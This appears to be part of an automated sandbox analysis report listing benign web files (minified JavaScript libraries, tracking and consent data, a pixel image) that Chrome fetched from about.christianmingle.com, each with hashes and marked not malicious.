                                                                                                                                                                                                                                                                                SSDEEP:96:9WsFpRR6JYMuuwCp0yXALwpdh02MGkm8NhRe61pecbt:9+d2CpRpjfMiMRHwcbt
                                                                                                                                                                                                                                                                                MD5:7487394C252ED25468A2037369D345E5
                                                                                                                                                                                                                                                                                SHA1:77E52C98B573C8DAD4542BA35D98A213B004D8AD
                                                                                                                                                                                                                                                                                SHA-256:919293E56B6A814A84A579B014F63A2423B0419C418494DA7BAA7C0C5893CDE1
                                                                                                                                                                                                                                                                                SHA-512:D60AA3C9FB3E33573819398EF86C8813AABE2B2932C65637D9BBF53860B760EA917E2FDA41C1B2EEF0D89EB9AC4495FD76E521B4B472D6C126770EAFBAED1BAD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(t){var i={};function r(n){var e;return(i[n]||(e=i[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,r),e.l=!0,e)).exports}r.m=t,r.c=i,r.d=function(n,e,t){r.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},r.t=function(e,n){if(1&n&&(e=r(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(r.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)r.d(t,i,function(n){return e[n]}.bind(null,i));return t},r.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return r.d(e,"a",e),e},r.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},r.p="",r(r.s=2)}([function(n,e){function t(n,e){return function(n){if(Array.isArray(n))return n}(n)||function(n,e){var t=null==n?null:"undefined"!=typ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1073
                                                                                                                                                                                                                                                                                Entropy (8bit):4.930836712180253
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:vdnelacjkK4SQTrtnmYYbbvqawYCBHkKQn8Vf:vojQSQTNmYYbxwXlkvnsf
                                                                                                                                                                                                                                                                                MD5:014AAB0AA2E3928CB452F8BCC10801CC
                                                                                                                                                                                                                                                                                SHA1:31183D4EA418BFC9FAEEE2BE86015BA8386A7947
                                                                                                                                                                                                                                                                                SHA-256:09BF9E53171E0B035FBC7DD81A269908671BD37E8CCB060FAACC2775BD8273BD
                                                                                                                                                                                                                                                                                SHA-512:2E75118E84315D7CAF75BB7C3AB37C5D0EB19EB6F5959E691835415D423552383CD200A7D6D2B945825296153E18AD76CDD61F6DF0318E47CD331D6F8E0DCF1E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*global jQuery */./*!.* FitText.js 1.2.*.* Copyright 2011, Dave Rupert http://daverupert.com.* Released under the WTFPL license.* http://sam.zoy.org/wtfpl/.*.* Date: Thu May 05 14:23:00 2011 -0600.*/..(function( $ ){.. $.fn.fitText = function( kompressor, options ) {.. // Setup options. var compressor = kompressor || 1,. settings = $.extend({. 'minFontSize' : Number.NEGATIVE_INFINITY,. 'maxFontSize' : $(this).css('font-size'). }, options);.. return this.each(function(){.. // Store the object. var $this = $(this);.. // Resizer() resizes items based on the object width divided by the compressor * 10. var resizer = function () {. $this.css('font-size', Math.max(Math.min($this.width() / (compressor*10), parseFloat(settings.maxFontSize)), parseFloat(settings.minFontSize)));. };.. // Call once to set.. resizer();.. // Call on resize. Opera debounces their resize by default.. $(window).on('resize.fi
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):349633
                                                                                                                                                                                                                                                                                Entropy (8bit):5.418341643700019
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:8JV0gSqdzJ3IZoCmn2y4nN4f9YPp8BwLzjPVhj1WOMUOxef54UjBuvZOWUX1YkEw:8JV06Qy4nN69YR8uLzzn1WOMU0ezdbP
                                                                                                                                                                                                                                                                                MD5:070C116054140A30A188BC802E8BDBF1
                                                                                                                                                                                                                                                                                SHA1:D4E57BB85D8CA74E4FAA0706FBE295C70B77BB64
                                                                                                                                                                                                                                                                                SHA-256:F00B02B25D3BE98C97BAC513DFA32828C1816692AB10A25A4BA31B3CC166251E
                                                                                                                                                                                                                                                                                SHA-512:2600DEBDBB3B3530ED8F4B8A96D6B581FC71CF0DB6DF26D729011D944BD2130A338162B19356F7B01FC8BEDD0C840A095233901619286360E28CC82519448497
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32050), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):66750
                                                                                                                                                                                                                                                                                Entropy (8bit):5.242545461142616
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:zEjMUkR2nC7xXyywDK2IgpnGdxg0B0FaQhDg8r7FQ4+tt3N3HyTI5dDV6rTRqkUs:Ijg7xynK2nTDFaY28xU5EwsPT7
                                                                                                                                                                                                                                                                                MD5:39143C2C1078B0D3082DDB949438E3D6
                                                                                                                                                                                                                                                                                SHA1:EBEE0B90FD9F5ECB74587BAADF156F05F09A836A
                                                                                                                                                                                                                                                                                SHA-256:B8192C69D0603C4B4EF821885797A3E6350EE9689364610D39CC96C9FB81E2C8
                                                                                                                                                                                                                                                                                SHA-512:3023261251F96FED60D879907A9DE428147F7B122C638A83ED2733BC7F5A52EEEFC1B37F12B8F459F51B18C3326199E035CBA2C7E7D27FC471D4490A9FFE9470
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/js/min/swiper.jquery.min.js?ver=3.3.0
                                                                                                                                                                                                                                                                                Preview:/**.. * Swiper 3.3.0.. * Most modern mobile touch slider and framework with hardware accelerated transitions.. * .. * http://www.idangero.us/swiper/.. * .. * Copyright 2016, Vladimir Kharlampidi.. * The iDangero.us.. * http://www.idangero.us/.. * .. * Licensed under MIT.. * .. * Released on: January 10, 2016.. */..!function(){"use strict";function e(e){e.fn.swiper=function(a){var s;return e(this).each(function(){var e=new t(this,a);s||(s=e)}),s}}var a,t=function(e,s){function r(e){return Math.floor(e)}function i(){y.autoplayTimeoutId=setTimeout(function(){y.params.loop?(y.fixLoop(),y._slideNext(),y.emit("onAutoplay",y)):y.isEnd?s.autoplayStopOnLast?y.stopAutoplay():(y._slideTo(0),y.emit("onAutoplay",y)):(y._slideNext(),y.emit("onAutoplay",y))},y.params.autoplay)}function n(e,t){var s=a(e.target);if(!s.is(t))if("string"==typeof t)s=s.parents(t);else if(t.nodeType){var r;return s.parents().each(function(e,a){a===t&&(r=t)}),r?t:void 0}if(0!==s.length)return s[0]}function o(e,a){a=a||{};va
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8668)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):8833
                                                                                                                                                                                                                                                                                Entropy (8bit):5.0631314208551395
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:5BwzxsMCm1dJDl6hj8P6PEGnvfiZaLkYluY4pLyUJWZPeGz+nrFr:5BQoIJDlC8CPZnvrLkYluYTUuPeGzs
                                                                                                                                                                                                                                                                                MD5:43B1AA1EA2D73E79E9D45980C7920446
                                                                                                                                                                                                                                                                                SHA1:1BEF149AEDEAFFF7A797E799CFBA168BED0D6DC6
                                                                                                                                                                                                                                                                                SHA-256:9C7BD3DADF6EDC19D3B8876A8E2B0B0AE6B54F403D7E987EC82B041128CFDD35
                                                                                                                                                                                                                                                                                SHA-512:A32D0D5CA42DDADAF3C4CA3A2570D8BC372A3494503E72F9E80043A0F742FAFB083899D4F8E2EE73740FDD32409EC34A5D45D5A62B79C5160A4E28A3DE8BFD42
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/waypoints.min.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:/*!.Waypoints - 4.0.0.Copyright . 2011-2015 Caleb Troughton.Licensed under the MIT license..https://github.com/imakewebthings/waypoints/blog/master/licenses.txt.*/.!function(){"use strict";function t(o){if(!o)throw new Error("No options passed to Waypoint constructor");if(!o.element)throw new Error("No element option passed to Waypoint constructor");if(!o.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+e,this.options=t.Adapter.extend({},t.defaults,o),this.element=this.options.element,this.adapter=new t.Adapter(this.element),this.callback=o.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=t.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=t.Context.findOrCreateByElement(this.options.context),t.offsetAliases[this.options.offset]&&(this.options.offset=t.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this)
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2779), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2779
                                                                                                                                                                                                                                                                                Entropy (8bit):5.567564483698167
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:n8ZZTHEUh2DqHiwQoSmy6p2om4wZFCm3+tzah5IEuNJRB4SNWcGDPze5X:nS6m08id7mXhm4kxOtH/JRhl4Pzed
                                                                                                                                                                                                                                                                                MD5:DBEBA3FAAABBD0435EA132D2C434E556
                                                                                                                                                                                                                                                                                SHA1:A91AFFB646C620544F9FA16C29188827F23D0CCA
                                                                                                                                                                                                                                                                                SHA-256:78D36975165D23F15DD96C268B4B59226B6F781EC01FF132E9A87741EC014FCE
                                                                                                                                                                                                                                                                                SHA-512:BDF13C75D037EA4288A81D596AFB51406557D4CEADB7D58C1EC7179BC793A0CE45DBD302E36B31F721594240766ED5A041BBD4E55B56CA18E94BA90566128DA9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:TFASC.trkCallback({"trc":{"si":"e3c4f85c64d3b9cde008fe22941cb3c3","sd":"v2_e3c4f85c64d3b9cde008fe22941cb3c3_b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779_1728225786_1728225786_CNawjgYQ7bxEGPHRopKmMiABKAMw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiQgI6I5eeGxhBwAYABAA","ui":"b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779","plc":"DESK","wi":"7469561950141635588","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1121901","cpb":"EhIyMDI0MTAwNi0zLVJFTEVBU0UYASCc__________8BKhljaC50YWJvb2xhc3luZGljYXRpb24uY29tMg90cmMtdHJhY2tpbmc4MDM4gPa5QUCRpA5I1aYPUNmI1wNY9QNjCN7__________wEQ3v__________ARgiZGMIw28QvY8BGDJkYwjXFhDVHxgjZGMI4k8QnWoYNmRjCJYUEJocGBhkYwjSAxDgBhgIZGMI7wMQiQcYCWRjCJZYEJZ0GAtkYwieaBCzlwEYPWRjCKQnEIM1GC9kYwj0FBCeHRgfZHgBgAHiI4gBy5mQ0gGQARiYAcbxopKmMtsBEAHcAQ","evh":"-1731850526","evi":{"50":"14275|18365","61":"13342|19379","47":"5028|6787"},"vl":[{"ri":"4d37b7b7f1ba63e8cfb2c39312ac0025","uip":"rbox-tracking","pp
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):18726
                                                                                                                                                                                                                                                                                Entropy (8bit):4.756109283632968
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                                                                                                                                                                                MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                                                                                                                                                                                SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                                                                                                                                                                                SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                                                                                                                                                                                SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-includes/js/wp-emoji-release.min.js?ver=6.5.3
                                                                                                                                                                                                                                                                                Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, truncated
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):27
                                                                                                                                                                                                                                                                                Entropy (8bit):3.169382490786664
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                                                                                                                MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                                                                                                                SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                                                                                                                SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                                                                                                                SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:...........................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (7601)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1196442
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1035903434727325
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:MWNxfRLBd1hrREjXWJ5hHDUWKx4t5k+1UBavZPka+k7BaCnlOkYFYpZdI2K:ZxfdBd1hrRemJ3jUWKxa5kTkLpPI2K
                                                                                                                                                                                                                                                                                MD5:850267DB771BB0D73B078A69C0E515F5
                                                                                                                                                                                                                                                                                SHA1:A7A0E12E74981239191E016672FAA47BC1C29245
                                                                                                                                                                                                                                                                                SHA-256:94749A9A2A419C6962EA8C3634AEE02DA5FC8FC73054DC956EEADF710EC90BD5
                                                                                                                                                                                                                                                                                SHA-512:B814669A6CC3733BD8EC523083D9413B4A2638F113A09DAB321AFC39D67C4553ECDCE575FBD9740E61DE3DE6A8F695BE0AE90075DCBBCB245A3FCAF03EB7E046
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[80276,59612],{459612:(W,u,t)=>{var a=W.exports=t(619015);a.tz.load(t(379210))},619015:function(W,u,t){var a,b,o;//! moment-timezone.js.//! version : 0.5.44.//! Copyright (c) JS Foundation and other contributors.//! license : MIT.//! github.com/moment/moment-timezone.(function(p,O){"use strict";W.exports?W.exports=O(t(545334)):(b=[t(545334)],a=O,o=typeof a=="function"?a.apply(u,b):a,o!==void 0&&(W.exports=o))})(this,function(p){"use strict";p.version===void 0&&p.default&&(p=p.default);var O="0.5.44",A={},d={},n={},i={},L={},T;(!p||typeof p.version!="string")&&n0("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/");var Y=p.version.split("."),D=+Y[0],p0=+Y[1];(D<2||D===2&&p0<6)&&n0("Moment Timezone requires Moment.js >= 2.6.0. You are using Moment.js "+p.version+". See momentjs.com");function h(r){return r>96?r-87:r>64?r-29:r-48}function Q(r){var l=0,f=r.split("."),R=f[0],X=f[
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):3
                                                                                                                                                                                                                                                                                Entropy (8bit):1.584962500721156
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:P:P
                                                                                                                                                                                                                                                                                MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                                                                                                                                                SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                                                                                                                                                SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                                                                                                                                                SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{}.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (13479)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):13577
                                                                                                                                                                                                                                                                                Entropy (8bit):5.272065782731947
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                                                                                                                                                                                                MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                                                                                                                                                                SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                                                                                                                                                                SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                                                                                                                                                                SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                                                                                                                                                                                                                                                Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):48047
                                                                                                                                                                                                                                                                                Entropy (8bit):5.536527173922723
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:s7+VyDUAE4gZSPfu2YiHpaEBlzZK7HHxP9F:YU/4vPBdZK7nxVF
                                                                                                                                                                                                                                                                                MD5:FF47913C7516655FD4513E25A6983CEA
                                                                                                                                                                                                                                                                                SHA1:252D583FEF554D7FD4450567E55E9179B4D437D5
                                                                                                                                                                                                                                                                                SHA-256:6716207D8AF64D06BE048AB0B7FD9C4E723B8BB6FDB5CEABADA90866127FAE0C
                                                                                                                                                                                                                                                                                SHA-512:FD7BCCADCE06AF7BDE0D345E623C4B25222B45779E77F435CB62A9A18EE7BC79A6317126C828CDC94D2B9E6DDC2F5066DE20C6DC55B0BD157A44490A0FA0324D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:. {. "name": "otPcPanel",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY1BhbmVsIG90LWhpZGUgb3QtZmFkZS1pbiIgcm9sZT0iZGlhbG9nIiBhcmlhLWxhYmVsbGVkYnk9Im90LXBjLXRpdGxlIiBhcmlhLW1vZGFsPSJ0cnVlIj48IS0tIFBDIEhlYWRlciAtLT48ZGl2IGNsYXNzPSJvdC1wYy1oZWFkZXIiPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWNjZXB0IEFsbDwvYnV0dG9uPjxzZWN0aW9uIGNsYXNzPSJvdC1zZGstcm93IG90LWNhdC1ncnAiPjxoMyBpZD0ib3QtY2F0ZWdvcnktdGl0bGUiPk1hbmFnZSBDb29raWUgUHJlZmVyZW5jZXM8L2gzPjxkaXYgY2xhc3M9Im90LXBsaS1oZHIiPjxzcGFuIGNsYXNzPSJvdC1saS10aXRsZSI+Q29uc2VudDwvc3Bhbj4gPHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5MZWdpdC4gSW50ZXJ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 1 x 1, 8-bit grayscale, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):67
                                                                                                                                                                                                                                                                                Entropy (8bit):4.155913092085415
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlE+tj+w1wGdqlk/UTp:6v/lhPfgw1w4UTp
                                                                                                                                                                                                                                                                                MD5:055E4DA0110B56ECE948DBE80DA320F0
                                                                                                                                                                                                                                                                                SHA1:9BE51523DAEF1AF7CB0BB9EF33B25C28C4386985
                                                                                                                                                                                                                                                                                SHA-256:5E76EC71AB6DEC2AEC8EF4B512C31D08C8D568861900FE4392B6AD99409178F1
                                                                                                                                                                                                                                                                                SHA-512:638E22CD4CD00704CA8B1654418D2CED85ACDC10A56490EAF41E659AF4E4C1175CB54DC9FEA7798645D443B25B8428F44F5B7227E7C1B4357897D119DF9C6A0B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ruletridominium.web.app/tp.png
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............:~.U....IDAT.Wc.......ZMo.....IEND.B`.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (28900), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):29067
                                                                                                                                                                                                                                                                                Entropy (8bit):4.756576399136628
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:1u5yWeTUKW+KlkJ5de2UYDyVfwYUas8l8yQ/8dwwdZ:ulr+Klk3Yi+fwYUf8l8yQ/eV
                                                                                                                                                                                                                                                                                MD5:FEA395DB9A5C8EABA924D98161324597
                                                                                                                                                                                                                                                                                SHA1:3C1D63DD1176C77F9F4CDB1616FBB08C31B9822F
                                                                                                                                                                                                                                                                                SHA-256:ED0F05101D480726C58BCD4956A1E7B02F12B538D02058F1B0EBFDABE8A7EF42
                                                                                                                                                                                                                                                                                SHA-512:8B1378CAE4D1B877EF6B74F5649B487785E2EF4DA32AD93ACC96100BCD546551FCB814086B0E4179E87E2370DD67457CFBA7D2F1D664BC347470A94600EED019
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/font-awesome.min.css?ver=4.6.3
